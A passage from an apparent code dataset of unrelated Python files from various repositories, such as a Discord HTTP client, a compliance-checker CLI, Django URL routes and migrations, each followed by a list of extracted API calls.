'_viso2.TrackVector___delslice__', (['self', 'i', 'j'], {}), '(self, i, j)\n', (55702, 55714), False, 'import _viso2\n'), ((55852, 55895), '_viso2.TrackVector___delitem__', '_viso2.TrackVector___delitem__', (['self', '*args'], {}), '(self, *args)\n', (55882, 55895), False, 'import _viso2\n'), ((56057, 56100), '_viso2.TrackVector___getitem__', '_viso2.TrackVector___getitem__', (['self', '*args'], {}), '(self, *args)\n', (56087, 56100), False, 'import _viso2\n'), ((56277, 56320), '_viso2.TrackVector___setitem__', '_viso2.TrackVector___setitem__', (['self', '*args'], {}), '(self, *args)\n', (56307, 56320), False, 'import _viso2\n'), ((56390, 56418), '_viso2.TrackVector_pop', '_viso2.TrackVector_pop', (['self'], {}), '(self)\n', (56412, 56418), False, 'import _viso2\n'), ((56491, 56525), '_viso2.TrackVector_append', '_viso2.TrackVector_append', (['self', 'x'], {}), '(self, x)\n', (56516, 56525), False, 'import _viso2\n'), ((56598, 56628), '_viso2.TrackVector_empty', '_viso2.TrackVector_empty', (['self'], {}), '(self)\n', (56622, 56628), False, 'import _viso2\n'), ((56742, 56771), '_viso2.TrackVector_size', '_viso2.TrackVector_size', (['self'], {}), '(self)\n', (56765, 56771), False, 'import _viso2\n'), ((56840, 56872), '_viso2.TrackVector_swap', '_viso2.TrackVector_swap', (['self', 'v'], {}), '(self, v)\n', (56863, 56872), False, 'import _viso2\n'), ((56987, 57017), '_viso2.TrackVector_begin', '_viso2.TrackVector_begin', (['self'], {}), '(self)\n', (57011, 57017), False, 'import _viso2\n'), ((57128, 57156), '_viso2.TrackVector_end', '_viso2.TrackVector_end', (['self'], {}), '(self)\n', (57150, 57156), False, 'import _viso2\n'), ((57281, 57312), '_viso2.TrackVector_rbegin', '_viso2.TrackVector_rbegin', (['self'], {}), '(self)\n', (57306, 57312), False, 'import _viso2\n'), ((57433, 57462), '_viso2.TrackVector_rend', '_viso2.TrackVector_rend', (['self'], {}), '(self)\n', (57456, 57462), False, 'import _viso2\n'), ((57527, 57557), '_viso2.TrackVector_clear', '_viso2.TrackVector_clear', (['self'], {}), '(self)\n', (57551, 57557), False, 'import _viso2\n'), ((57694, 57732), '_viso2.TrackVector_get_allocator', '_viso2.TrackVector_get_allocator', (['self'], {}), '(self)\n', (57726, 57732), False, 'import _viso2\n'), ((57803, 57836), '_viso2.TrackVector_pop_back', '_viso2.TrackVector_pop_back', (['self'], {}), '(self)\n', (57830, 57836), False, 'import _viso2\n'), ((58064, 58101), '_viso2.TrackVector_erase', '_viso2.TrackVector_erase', (['self', '*args'], {}), '(self, *args)\n', (58088, 58101), False, 'import _viso2\n'), ((58351, 58380), '_viso2.new_TrackVector', '_viso2.new_TrackVector', (['*args'], {}), '(*args)\n', (58373, 58380), False, 'import _viso2\n'), ((58573, 58610), '_viso2.TrackVector_push_back', '_viso2.TrackVector_push_back', (['self', 'x'], {}), '(self, x)\n', (58601, 58610), False, 'import _viso2\n'), ((58684, 58714), '_viso2.TrackVector_front', '_viso2.TrackVector_front', (['self'], {}), '(self)\n', (58708, 58714), False, 'import _viso2\n'), ((58786, 58815), '_viso2.TrackVector_back', '_viso2.TrackVector_back', (['self'], {}), '(self)\n', (58809, 58815), False, 'import _viso2\n'), ((58894, 58931), '_viso2.TrackVector_assign', '_viso2.TrackVector_assign', (['self', 'n', 'x'], {}), '(self, n, x)\n', (58919, 58931), False, 'import _viso2\n'), ((59067, 59105), '_viso2.TrackVector_resize', '_viso2.TrackVector_resize', (['self', '*args'], {}), '(self, *args)\n', (59092, 59105), False, 'import _viso2\n'), ((59287, 59325), '_viso2.TrackVector_insert', '_viso2.TrackVector_insert', (['self', '*args'], {}), '(self, *args)\n', (59312, 59325), False, 'import _viso2\n'), ((59400, 59435), '_viso2.TrackVector_reserve', '_viso2.TrackVector_reserve', (['self', 'n'], {}), '(self, n)\n', (59426, 59435), False, 'import _viso2\n'), ((59557, 59590), '_viso2.TrackVector_capacity', '_viso2.TrackVector_capacity', (['self'], {}), '(self)\n', (59584, 59590), False, 'import _viso2\n'), ((488, 518), 'importlib.import_module', 'importlib.import_module', (['mname'], {}), '(mname)\n', (511, 518), False, 'import importlib\n'), ((566, 599), 'importlib.import_module', 'importlib.import_module', (['"""_viso2"""'], {}), "('_viso2')\n", (589, 599), False, 'import importlib\n'), ((1021, 1073), 'imp.load_module', 'imp.load_module', (['"""_viso2"""', 'fp', 'pathname', 'description'], {}), "('_viso2', fp, pathname, description)\n", (1036, 1073), False, 'import imp\n'), ((889, 906), 'os.path.dirname', 'dirname', (['__file__'], {}), '(__file__)\n', (896, 906), False, 'from os.path import dirname\n')] |
Yandawl/restcord.py | restcord/http.py | eeaf75f4a3d05f3837906a60d5f4a9395c4933ff | # -*- coding: utf-8 -*-
import asyncio
import datetime
import json
import logging
import sys
from typing import Optional
import aiohttp
from aiohttp import ClientSession
from . import __version__
from .errors import (
BadGateway,
BadRequest,
Forbidden,
HTTPException,
InternalServerError,
NotFound,
RateLimited
)
__log__ = logging.getLogger(__name__)
__all__ = (
'Route',
'HTTPClient'
)
class Route:
BASE = 'https://discord.com/api'
def __init__(self, method, path):
self.path = path
self.method = method
self.url = (self.BASE + self.path)
class HTTPClient:
__slots__ = ('token', 'loop', 'proxy', 'proxy_auth', '__session', '__agent')
def __init__(self, token: str, loop=None, proxy=None, proxy_auth=None, session: Optional[ClientSession] = None) -> None:
self.token = token
self.loop = asyncio.get_event_loop() if loop is None else loop
self.proxy = proxy
self.proxy_auth = proxy_auth
self.__session = session
self.__agent = f'RestCord.py (https://github.com/Yandawl/restcord.py {__version__}) Python/{sys.version_info[0]}.{sys.version_info[1]} aiohttp/{aiohttp.__version__}'
async def __aenter__(self):
return self
async def __aexit__(self, exc_type, exc, tb):
await self.close()
@property
def session(self) -> ClientSession:
""":class:`ClientSession`: The aiohttp ClientSession."""
if self.__session is None or self.__session.closed:
self.__session = ClientSession()
return self.__session
async def close(self):
if self.__session:
await self.__session.close()
async def _request(self, route: Route, **kwargs):
method = route.method
url = route.url
kwargs['headers'] = {
'User-Agent': self.__agent,
'X-Ratelimit-Precision': 'millisecond',
'Authorization': f'Bot {self.token}'
}
if 'json' in kwargs:
kwargs['headers']['Content-Type'] = 'application/json'
kwargs['data'] = self.__to_json(kwargs.pop('json'))
if self.proxy is not None:
kwargs['proxy'] = self.proxy
if self.proxy_auth is not None:
kwargs['proxy_auth'] = self.proxy_auth
async with self.session.request(method, url, **kwargs) as r:
__log__.debug(f'{method} {url} with {kwargs.get("data")} has returned {r.status}')
data = await self.__get_data(r)
remaining = r.headers.get('X-Ratelimit-Remaining')
if remaining == '0' and r.status != 429:
__log__.debug(f'A rate limit bucket has been exhausted (retry: {self.__parse_ratelimit_header(r)}).')
if 300 > r.status >= 200:
__log__.debug(f'{method} {url} has received {data}')
return data
if r.status == 429:
raise RateLimited(r, data)
if r.status == 400:
raise BadRequest(r, data)
if r.status == 403:
raise Forbidden(r, data)
if r.status == 404:
raise NotFound(r, data)
if r.status == 500:
raise InternalServerError(r, data)
if r.status == 502:
raise BadGateway(r, data)
raise HTTPException(r, data)
async def __get_data(self, response):
text = await response.text(encoding='utf-8')
try:
if response.headers['content-type'] == 'application/json':
return json.loads(text)
except KeyError:
pass
return text
def __parse_ratelimit_header(self, request, *, use_clock=False):
reset_after = request.headers.get('X-Ratelimit-Reset-After')
if use_clock or not reset_after:
utc = datetime.timezone.utc
now = datetime.datetime.now(utc)
reset = datetime.datetime.fromtimestamp(float(request.headers['X-Ratelimit-Reset']), utc)
return (reset - now).total_seconds()
else:
return float(reset_after)
def __to_json(self, obj):
return json.dumps(obj, separators=(',', ':'), ensure_ascii=True)
| [((354, 381), 'logging.getLogger', 'logging.getLogger', (['__name__'], {}), '(__name__)\n', (371, 381), False, 'import logging\n'), ((4193, 4250), 'json.dumps', 'json.dumps', (['obj'], {'separators': "(',', ':')", 'ensure_ascii': '(True)'}), "(obj, separators=(',', ':'), ensure_ascii=True)\n", (4203, 4250), False, 'import json\n'), ((891, 915), 'asyncio.get_event_loop', 'asyncio.get_event_loop', ([], {}), '()\n', (913, 915), False, 'import asyncio\n'), ((1553, 1568), 'aiohttp.ClientSession', 'ClientSession', ([], {}), '()\n', (1566, 1568), False, 'from aiohttp import ClientSession\n'), ((3917, 3943), 'datetime.datetime.now', 'datetime.datetime.now', (['utc'], {}), '(utc)\n', (3938, 3943), False, 'import datetime\n'), ((3599, 3615), 'json.loads', 'json.loads', (['text'], {}), '(text)\n', (3609, 3615), False, 'import json\n')] |
Anmol-Singh-Jaggi/interview-notes | notes/algo-ds-practice/problems/graph/mother_vertex.py | 65af75e2b5725894fa5e13bb5cd9ecf152a0d652 | '''
What is a Mother Vertex?
A mother vertex in a graph G = (V,E) is a vertex v such that all other vertices in G can be reached by a path from v.
How to find mother vertex?
Case 1:- Undirected Connected Graph : In this case, all the vertices are mother vertices as we can reach to all the other nodes in the graph.
Case 2:- Undirected/Directed Disconnected Graph : In this case, there is no mother vertices as we cannot reach to all the other nodes in the graph.
Case 3:- Directed Connected Graph : In this case, we have to find a vertex -v in the graph such that we can reach to all the other nodes in the graph through a directed path.
SOLUTION:
If there exist mother vertex (or vertices), then one of the mother vertices is the last finished vertex in DFS. (Or a mother vertex has the maximum finish time in DFS traversal).
A vertex is said to be finished in DFS if a recursive call for its DFS is over, i.e., all descendants of the vertex have been visited.
Algorithm :
Do DFS traversal of the given graph. While doing traversal keep track of last finished vertex ‘v’. This step takes O(V+E) time.
If there exist mother vertex (or vetices), then v must be one (or one of them). Check if v is a mother vertex by doing DFS/BFS from v. This step also takes O(V+E) time.
Note that there is no need to literally store the finish time for each vertex.
We can just do:
...
...
if node not in visited:
dfs(node)
latest = node
...
...
# Check if latest is indeed a mother vertex.
'''
| [] |
MoShitrit/kubernetes-controller-example | app/config.py | 210a75ddf9c423c55be248ed21f2b6dea160a782 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
import os
class Config:
api_group = os.environ.get('API_GROUP', 'hello-k8s.s5t.dev')
auth_method = os.environ.get("AUTH_METHOD", "cluster")
examples_plural = os.environ.get('API_PLURAL', 'examples')
examples_version = os.environ.get('API_VERSION', 'v1alpha1')
log_level = os.environ.get("LOG_LEVEL", "INFO")
namespace = os.environ.get('NAMESPACE', 'default')
version = '1.0.0'
def main():
pass
if __name__ == "__main__":
main()
| [((88, 136), 'os.environ.get', 'os.environ.get', (['"""API_GROUP"""', '"""hello-k8s.s5t.dev"""'], {}), "('API_GROUP', 'hello-k8s.s5t.dev')\n", (102, 136), False, 'import os\n'), ((155, 195), 'os.environ.get', 'os.environ.get', (['"""AUTH_METHOD"""', '"""cluster"""'], {}), "('AUTH_METHOD', 'cluster')\n", (169, 195), False, 'import os\n'), ((218, 258), 'os.environ.get', 'os.environ.get', (['"""API_PLURAL"""', '"""examples"""'], {}), "('API_PLURAL', 'examples')\n", (232, 258), False, 'import os\n'), ((282, 323), 'os.environ.get', 'os.environ.get', (['"""API_VERSION"""', '"""v1alpha1"""'], {}), "('API_VERSION', 'v1alpha1')\n", (296, 323), False, 'import os\n'), ((340, 375), 'os.environ.get', 'os.environ.get', (['"""LOG_LEVEL"""', '"""INFO"""'], {}), "('LOG_LEVEL', 'INFO')\n", (354, 375), False, 'import os\n'), ((392, 430), 'os.environ.get', 'os.environ.get', (['"""NAMESPACE"""', '"""default"""'], {}), "('NAMESPACE', 'default')\n", (406, 430), False, 'import os\n')] |
greenie-msft/mechanical-markdown | mechanical_markdown/parsers.py | 4fb410a34038fab7d270383561726dd4da7a2aca |
"""
Copyright (c) Microsoft Corporation.
Licensed under the MIT License.
"""
import re
import yaml
from html.parser import HTMLParser
from mistune import Renderer
from mechanical_markdown.step import Step
start_token = 'STEP'
end_token = 'END_STEP'
ignore_links_token = 'IGNORE_LINKS'
end_ignore_links_token = 'END_IGNORE'
class MarkdownAnnotationError(Exception):
pass
class HTMLCommentParser(HTMLParser):
def __init__(self, **kwargs):
super().__init__(**kwargs)
self.comment_text = ""
def handle_comment(self, comment):
self.comment_text += comment
class RecipeParser(Renderer):
def __init__(self, shell, **kwargs):
super().__init__(**kwargs)
self.current_step = None
self.all_steps = []
self.external_links = []
self.ignore_links = False
self.shell = shell
def block_code(self, text, lang):
if (lang is not None and lang.strip() in ('bash', 'sh', 'shell-script', 'shell')
and self.current_step is not None):
self.current_step.add_command_block(text)
return ""
def block_html(self, text):
comment_parser = HTMLCommentParser()
comment_parser.feed(text)
comment_body = comment_parser.comment_text
if comment_body.find(end_token) >= 0:
if self.current_step is None:
raise MarkdownAnnotationError("Unexpected <!-- {} --> found".format(end_token))
self.all_steps.append(self.current_step)
self.current_step = None
return ""
elif comment_body.find(ignore_links_token) >= 0:
if self.ignore_links:
raise MarkdownAnnotationError(f"Duplicate <!-- {ignore_links_token} --> found")
self.ignore_links = True
elif comment_body.find(end_ignore_links_token) >= 0:
if not self.ignore_links:
raise MarkdownAnnotationError("Unexpected <!-- {} --> found".format(end_ignore_links_token))
self.ignore_links = False
start_pos = comment_body.find(start_token)
if start_pos < 0:
return ""
if self.current_step is not None:
raise MarkdownAnnotationError(f"<!-- {start_token} --> found while still processing previous step")
start_pos += len(start_token)
self.current_step = Step(yaml.safe_load(comment_body[start_pos:]), self.shell)
return ""
def link(self, link, text=None, title=None):
if re.match("https?://", link) is not None:
self.external_links.append((link, self.ignore_links))
| [((2372, 2412), 'yaml.safe_load', 'yaml.safe_load', (['comment_body[start_pos:]'], {}), '(comment_body[start_pos:])\n', (2386, 2412), False, 'import yaml\n'), ((2506, 2533), 're.match', 're.match', (['"""https?://"""', 'link'], {}), "('https?://', link)\n", (2514, 2533), False, 'import re\n')] |
jakepolatty/compliance-checker | cchecker.py | 89d362c0616df0267a6a14227fdb9a05daada28e | #!/usr/bin/env python
from __future__ import print_function
import argparse
import sys
from compliance_checker.runner import ComplianceChecker, CheckSuite
from compliance_checker.cf.util import download_cf_standard_name_table
from compliance_checker import __version__
def main():
# Load all available checker classes
check_suite = CheckSuite()
check_suite.load_all_available_checkers()
parser = argparse.ArgumentParser()
parser.add_argument('--test', '-t', '--test=', '-t=', default=[],
action='append',
help=("Select the Checks you want to perform. Defaults to 'acdd'"
" if unspecified. Versions of standards can be specified via "
"`-t <test_standard>:<version>`. If `<version>` is omitted, or "
"is \"latest\", the latest version of the test standard is used."))
parser.add_argument('--criteria', '-c',
help=("Define the criteria for the checks. "
"Either Strict, Normal, or Lenient. Defaults to Normal."),
nargs='?', default='normal',
choices=['lenient', 'normal', 'strict'])
parser.add_argument('--verbose', '-v',
help="Increase output. May be specified up to three times.",
action="count",
default=0)
parser.add_argument('--skip-checks', '-s',
help="Specifies tests to skip",
action='append')
parser.add_argument('-f', '--format', default=[], action='append',
help=("Output format(s). Options are 'text', 'html', 'json', 'json_new'."
" The difference between the 'json' and the 'json_new'"
" formats is that the 'json' format has the check as the top level"
" key, whereas the 'json_new' format has the dataset name(s) as the"
" main key in the output follow by any checks as subkeys. Also, "
"'json' format can be only be run against one input file, whereas "
"'json_new' can be run against multiple files."))
parser.add_argument('-o', '--output', default=[], action='append',
help=("Output filename(s). If '-' is supplied, output to stdout."
" Can either be one or many files. If one file is supplied,"
" but the checker is run against many files, all the output"
" from the checks goes to that file (does not presently work "
"with 'json' format). If more than one output file is "
"supplied, the number of input datasets supplied must match "
"the number of output files."))
parser.add_argument('-V', '--version', action='store_true',
help='Display the IOOS Compliance Checker version information.')
parser.add_argument('dataset_location', nargs='*',
help="Defines the location of the dataset to be checked.")
parser.add_argument('-l', '--list-tests', action='store_true',
help='List the available tests')
parser.add_argument('-d', '--download-standard-names',
help=("Specify a version of the cf standard name table"
" to download as packaged version"))
args = parser.parse_args()
if args.version:
print("IOOS compliance checker version %s" % __version__)
return 0
if args.list_tests:
print("IOOS compliance checker available checker suites:")
for checker in sorted(check_suite.checkers.keys()):
version = getattr(check_suite.checkers[checker],
'_cc_checker_version', "???")
if args.verbose:
print(" - {} (v{})".format(checker, version))
elif ':' in checker and not checker.endswith(':latest'): # Skip the "latest" output
print(" - {}".format(checker))
return 0
if args.download_standard_names:
download_cf_standard_name_table(args.download_standard_names)
# Check the number of output files
if not args.output:
args.output = '-'
output_len = len(args.output)
if not (output_len == 1 or output_len == len(args.dataset_location)):
print('The number of output files must either be one or the same as the number of datasets', file=sys.stderr)
sys.exit(2)
# Check the output formats
format_choices = ['text', 'html', 'json', 'json_new']
for out_format in args.format:
if out_format not in format_choices:
print(("Error: argument -f/--format: invalid choice: '{}'"
" (choose from 'text', 'html', 'json', 'json_new')".format(out_format)))
sys.exit(2)
# Run the compliance checker
# 2 modes, concatenated output file or multiple output files
return_values = []
had_errors = []
if output_len == 1:
if args.format != 'json':
print("Running Compliance Checker on the datasets from: {}".format(args.dataset_location), file=sys.stderr)
return_value, errors = ComplianceChecker.run_checker(args.dataset_location,
args.test or ['acdd'],
args.verbose,
args.criteria,
args.skip_checks,
args.output[0],
args.format or ['text'])
return_values.append(return_value)
had_errors.append(errors)
else:
for output, dataset in zip(args.output, args.dataset_location):
if args.format != 'json':
print("Running Compliance Checker on the dataset from: {}".format(dataset), file=sys.stderr)
return_value, errors = ComplianceChecker.run_checker([dataset],
args.test or ['acdd'],
args.verbose,
args.criteria,
args.skip_checks,
output,
args.format or ['text'])
return_values.append(return_value)
had_errors.append(errors)
if any(had_errors):
return 2
if all(return_values):
return 0
return 1
if __name__ == "__main__":
sys.exit(main())
| [((343, 355), 'compliance_checker.runner.CheckSuite', 'CheckSuite', ([], {}), '()\n', (353, 355), False, 'from compliance_checker.runner import ComplianceChecker, CheckSuite\n'), ((416, 441), 'argparse.ArgumentParser', 'argparse.ArgumentParser', ([], {}), '()\n', (439, 441), False, 'import argparse\n'), ((4343, 4404), 'compliance_checker.cf.util.download_cf_standard_name_table', 'download_cf_standard_name_table', (['args.download_standard_names'], {}), '(args.download_standard_names)\n', (4374, 4404), False, 'from compliance_checker.cf.util import download_cf_standard_name_table\n'), ((4729, 4740), 'sys.exit', 'sys.exit', (['(2)'], {}), '(2)\n', (4737, 4740), False, 'import sys\n'), ((5449, 5621), 'compliance_checker.runner.ComplianceChecker.run_checker', 'ComplianceChecker.run_checker', (['args.dataset_location', "(args.test or ['acdd'])", 'args.verbose', 'args.criteria', 'args.skip_checks', 'args.output[0]', "(args.format or ['text'])"], {}), "(args.dataset_location, args.test or ['acdd'],\n args.verbose, args.criteria, args.skip_checks, args.output[0], args.\n format or ['text'])\n", (5478, 5621), False, 'from compliance_checker.runner import ComplianceChecker, CheckSuite\n'), ((5086, 5097), 'sys.exit', 'sys.exit', (['(2)'], {}), '(2)\n', (5094, 5097), False, 'import sys\n'), ((6320, 6468), 'compliance_checker.runner.ComplianceChecker.run_checker', 'ComplianceChecker.run_checker', (['[dataset]', "(args.test or ['acdd'])", 'args.verbose', 'args.criteria', 'args.skip_checks', 'output', "(args.format or ['text'])"], {}), "([dataset], args.test or ['acdd'], args.\n verbose, args.criteria, args.skip_checks, output, args.format or ['text'])\n", (6349, 6468), False, 'from compliance_checker.runner import ComplianceChecker, CheckSuite\n')] |
creimers/djangocms-delete-error | apps/articles/cms_apps.py | f38b8a7a277d98060a2b04d9552f26eff3c1c552 | from cms.app_base import CMSApp
from cms.apphook_pool import apphook_pool
from django.utils.translation import gettext as _
class CategoriesAppHook(CMSApp):
name = _("Categories")
def get_urls(self, page=None, language=None, **kwargs):
return ["apps.articles.urls"]
apphook_pool.register(CategoriesAppHook)
| [((287, 327), 'cms.apphook_pool.apphook_pool.register', 'apphook_pool.register', (['CategoriesAppHook'], {}), '(CategoriesAppHook)\n', (308, 327), False, 'from cms.apphook_pool import apphook_pool\n'), ((170, 185), 'django.utils.translation.gettext', '_', (['"""Categories"""'], {}), "('Categories')\n", (171, 185), True, 'from django.utils.translation import gettext as _\n')] |
sourcelair/bouncer-api | bouncer/blacklist/signals.py | 132c63bbd470b0635054ad71656d0303b39ee421 | from django.db.models.signals import pre_save
from django.dispatch import receiver
from blacklist import models
from hashlib import sha256
@receiver(pre_save, sender=models.EmailEntry)
def email_entry_handler(sender, instance, **kwargs):
"""
Handler that assigns to lower_case_entry_value the entry_value.lower()
"""
instance.lower_case_entry_value = instance.entry_value.lower()
email_hasher = sha256(instance.lower_case_entry_value.encode())
instance.hashed_value = email_hasher.hexdigest().lower()
@receiver(pre_save, sender=models.IPEntry)
@receiver(pre_save, sender=models.EmailHostEntry)
def entry_handler(instance, **kwargs):
"""
Handler that assigns to lower_case_entry_value the entry_value.lower()
"""
instance.lower_case_entry_value = instance.entry_value.lower()
| [((142, 186), 'django.dispatch.receiver', 'receiver', (['pre_save'], {'sender': 'models.EmailEntry'}), '(pre_save, sender=models.EmailEntry)\n', (150, 186), False, 'from django.dispatch import receiver\n'), ((531, 572), 'django.dispatch.receiver', 'receiver', (['pre_save'], {'sender': 'models.IPEntry'}), '(pre_save, sender=models.IPEntry)\n', (539, 572), False, 'from django.dispatch import receiver\n'), ((574, 622), 'django.dispatch.receiver', 'receiver', (['pre_save'], {'sender': 'models.EmailHostEntry'}), '(pre_save, sender=models.EmailHostEntry)\n', (582, 622), False, 'from django.dispatch import receiver\n')] |
collaer/boardgames | app/boardgames/migrations/0001_initial.py | 51dd9ec257e5d5bab23a88b10a5f91fdd7fe4210 | # Generated by Django 3.1 on 2020-08-22 17:48
from django.db import migrations, models
class Migration(migrations.Migration):
initial = True
dependencies = [
]
operations = [
migrations.CreateModel(
name='BoardGame',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('title', models.CharField(max_length=50)),
('eidtion_year', models.IntegerField()),
('designer', models.CharField(max_length=30)),
('game_duration_min', models.IntegerField()),
('player_number', models.IntegerField()),
('rating', models.IntegerField(choices=[(1, 'Very bad'), (2, 'Bad'), (3, 'Regular'), (4, 'Good'), (5, 'Very good')])),
('played', models.BooleanField()),
('acquisition_date', models.DateField()),
],
),
]
| [((303, 396), 'django.db.models.AutoField', 'models.AutoField', ([], {'auto_created': '(True)', 'primary_key': '(True)', 'serialize': '(False)', 'verbose_name': '"""ID"""'}), "(auto_created=True, primary_key=True, serialize=False,\n verbose_name='ID')\n", (319, 396), False, 'from django.db import migrations, models\n'), ((421, 452), 'django.db.models.CharField', 'models.CharField', ([], {'max_length': '(50)'}), '(max_length=50)\n', (437, 452), False, 'from django.db import migrations, models\n'), ((488, 509), 'django.db.models.IntegerField', 'models.IntegerField', ([], {}), '()\n', (507, 509), False, 'from django.db import migrations, models\n'), ((541, 572), 'django.db.models.CharField', 'models.CharField', ([], {'max_length': '(30)'}), '(max_length=30)\n', (557, 572), False, 'from django.db import migrations, models\n'), ((613, 634), 'django.db.models.IntegerField', 'models.IntegerField', ([], {}), '()\n', (632, 634), False, 'from django.db import migrations, models\n'), ((671, 692), 'django.db.models.IntegerField', 'models.IntegerField', ([], {}), '()\n', (690, 692), False, 'from django.db import migrations, models\n'), ((722, 832), 'django.db.models.IntegerField', 'models.IntegerField', ([], {'choices': "[(1, 'Very bad'), (2, 'Bad'), (3, 'Regular'), (4, 'Good'), (5, 'Very good')]"}), "(choices=[(1, 'Very bad'), (2, 'Bad'), (3, 'Regular'), (\n 4, 'Good'), (5, 'Very good')])\n", (741, 832), False, 'from django.db import migrations, models\n'), ((857, 878), 'django.db.models.BooleanField', 'models.BooleanField', ([], {}), '()\n', (876, 878), False, 'from django.db import migrations, models\n'), ((918, 936), 'django.db.models.DateField', 'models.DateField', ([], {}), '()\n', (934, 936), False, 'from django.db import migrations, models\n')] |
BlueRidgeLabs/slack-meetups | matcher/utils.py | aca850d4265f30f6d76bed1b1baeb2973c60c83d | import re
# regex for a user or channel mention at the beginning of a message
# example matches: " <@UJQ07L30Q> ", "<#C010P8N1ABB|interns>"
# interactive playground: https://regex101.com/r/2Z7eun/2
MENTION_PATTERN = r"(?:^\s?<@(.*?)>\s?)|(?:^\s?<#(.*?)\|.*?>\s?)"
def get_set_element(_set):
"""get the element from the set to which the iterator points; returns an
arbitrary item
"""
for element in _set:
return element
def get_person_from_match(user_id, match):
"""given a Match, return the Person corresponding to the passed user ID
"""
if match.person_1.user_id == user_id:
return match.person_1
elif match.person_2.user_id == user_id:
return match.person_2
else:
raise Exception(f"Person with user ID \"{user_id}\" is not part of "
f"the passed match ({match}).")
def get_other_person_from_match(user_id, match):
"""given a Match, return the Person corresponding to the user who is NOT
the passed user ID (i.e. the other Person)
"""
if match.person_1.user_id == user_id:
return match.person_2
elif match.person_2.user_id == user_id:
return match.person_1
else:
raise Exception(f"Person with user ID \"{user_id}\" is not part of "
f"the passed match ({match}).")
def blockquote(message):
"""return `message` with markdown blockquote formatting (start each line
with "> ")
"""
if message:
return re.sub(r"^", "> ", message, flags=re.MULTILINE)
else:
return None
def get_mention(message):
"""get the user or channel ID mentioned at the beginning of a message, if
any
"""
match = re.search(MENTION_PATTERN, message)
if match:
# return the first not-None value in the match group tuple, be it a
# user or channel mention
# https://stackoverflow.com/a/18533669
return next(group for group in match.group(1, 2) if group is not None)
else:
return None
def remove_mention(message):
"""remove the user or channel mention from the beginning of a message, if
any
"""
return re.sub(MENTION_PATTERN, "", message, count=1)
| [((1683, 1718), 're.search', 're.search', (['MENTION_PATTERN', 'message'], {}), '(MENTION_PATTERN, message)\n', (1692, 1718), False, 'import re\n'), ((2135, 2180), 're.sub', 're.sub', (['MENTION_PATTERN', '""""""', 'message'], {'count': '(1)'}), "(MENTION_PATTERN, '', message, count=1)\n", (2141, 2180), False, 'import re\n'), ((1471, 1517), 're.sub', 're.sub', (['"""^"""', '"""> """', 'message'], {'flags': 're.MULTILINE'}), "('^', '> ', message, flags=re.MULTILINE)\n", (1477, 1517), False, 'import re\n')] |
pantskun/swordiemen | scripts/quest/q3526s.py | fc33ffec168e6611587fdc75de8270f6827a4176 | # In Search for the Lost Memory [Explorer Thief] (3526)
# To be replaced with GMS's exact dialogue.
# Following dialogue has been edited from DeepL on JMS's dialogue transcript (no KMS footage anywhere):
# https://kaengouraiu2.blog.fc2.com/blog-entry-46.html
recoveredMemory = 7081
darkLord = 1052001
sm.setSpeakerID(darkLord)
sm.sendNext("The way you moved without a trace...you must have exceptional talent. "
"Long time no see, #h #.")
sm.sendSay("Since when did you grow up to this point? You're no less inferior to any Dark Lord. "
"You were just a greenhorn that couldn't even hide their presence...Hmph, well, it's been a while since then. "
"Still, it feels weird to see you become so strong. I guess this is how it feels to be proud.")
sm.sendSay("But don't let your guard down. Know that there's still more progress to be made. "
"As the one who has made you into a thief, I know you that you can be even stronger...!")
sm.startQuest(parentID)
sm.completeQuest(parentID)
sm.startQuest(recoveredMemory)
sm.setQRValue(recoveredMemory, "1", False) | [] |
rummansadik/Admission-Automation | student/urls.py | a2fd305644cf60bfd0a381b855fb8c2810507f36 | from django.contrib.auth.views import LoginView
from django.urls import path
from student import views
urlpatterns = [
path('studentclick', views.studentclick_view, name='student-click'),
path('studentlogin', LoginView.as_view(
template_name='student/studentlogin.html'), name='studentlogin'),
path('studentsignup', views.student_signup_view, name='studentsignup'),
path('student-dashboard', views.student_dashboard_view,
name='student-dashboard'),
path('student-check', views.student_check_view, name='student-check'),
path('student-exam', views.student_exam_view, name='student-exam'),
path('take-exam/<int:pk>', views.take_exam_view, name='take-exam'),
path('start-exam/<int:pk>', views.start_exam_view, name='start-exam'),
path('calculate-marks', views.calculate_marks_view, name='calculate-marks'),
path('view-result', views.view_result_view, name='view-result'),
path('check-marks/<int:pk>', views.check_marks_view, name='check-marks'),
path('student-marks', views.student_marks_view, name='student-marks'),
path('expel/<int:pk>', views.student_expel_view, name='expel'),
path('video_feed', views.video_feed, name='video-feed'),
path('train_feed', views.train_feed, name='train-feed'),
path('check_feed', views.check_feed, name='check-feed'),
path('logout', views.student_logout_view, name='student-logout'),
]
| [((125, 192), 'django.urls.path', 'path', (['"""studentclick"""', 'views.studentclick_view'], {'name': '"""student-click"""'}), "('studentclick', views.studentclick_view, name='student-click')\n", (129, 192), False, 'from django.urls import path\n'), ((316, 386), 'django.urls.path', 'path', (['"""studentsignup"""', 'views.student_signup_view'], {'name': '"""studentsignup"""'}), "('studentsignup', views.student_signup_view, name='studentsignup')\n", (320, 386), False, 'from django.urls import path\n'), ((392, 478), 'django.urls.path', 'path', (['"""student-dashboard"""', 'views.student_dashboard_view'], {'name': '"""student-dashboard"""'}), "('student-dashboard', views.student_dashboard_view, name=\n 'student-dashboard')\n", (396, 478), False, 'from django.urls import path\n'), ((488, 557), 'django.urls.path', 'path', (['"""student-check"""', 'views.student_check_view'], {'name': '"""student-check"""'}), "('student-check', views.student_check_view, name='student-check')\n", (492, 557), False, 'from django.urls import path\n'), ((563, 629), 'django.urls.path', 'path', (['"""student-exam"""', 'views.student_exam_view'], {'name': '"""student-exam"""'}), "('student-exam', views.student_exam_view, name='student-exam')\n", (567, 629), False, 'from django.urls import path\n'), ((635, 701), 'django.urls.path', 'path', (['"""take-exam/<int:pk>"""', 'views.take_exam_view'], {'name': '"""take-exam"""'}), "('take-exam/<int:pk>', views.take_exam_view, name='take-exam')\n", (639, 701), False, 'from django.urls import path\n'), ((707, 776), 'django.urls.path', 'path', (['"""start-exam/<int:pk>"""', 'views.start_exam_view'], {'name': '"""start-exam"""'}), "('start-exam/<int:pk>', views.start_exam_view, name='start-exam')\n", (711, 776), False, 'from django.urls import path\n'), ((782, 857), 'django.urls.path', 'path', (['"""calculate-marks"""', 'views.calculate_marks_view'], {'name': '"""calculate-marks"""'}), "('calculate-marks', views.calculate_marks_view, name='calculate-marks')\n", (786, 857), False, 'from django.urls import path\n'), ((863, 926), 'django.urls.path', 'path', (['"""view-result"""', 'views.view_result_view'], {'name': '"""view-result"""'}), "('view-result', views.view_result_view, name='view-result')\n", (867, 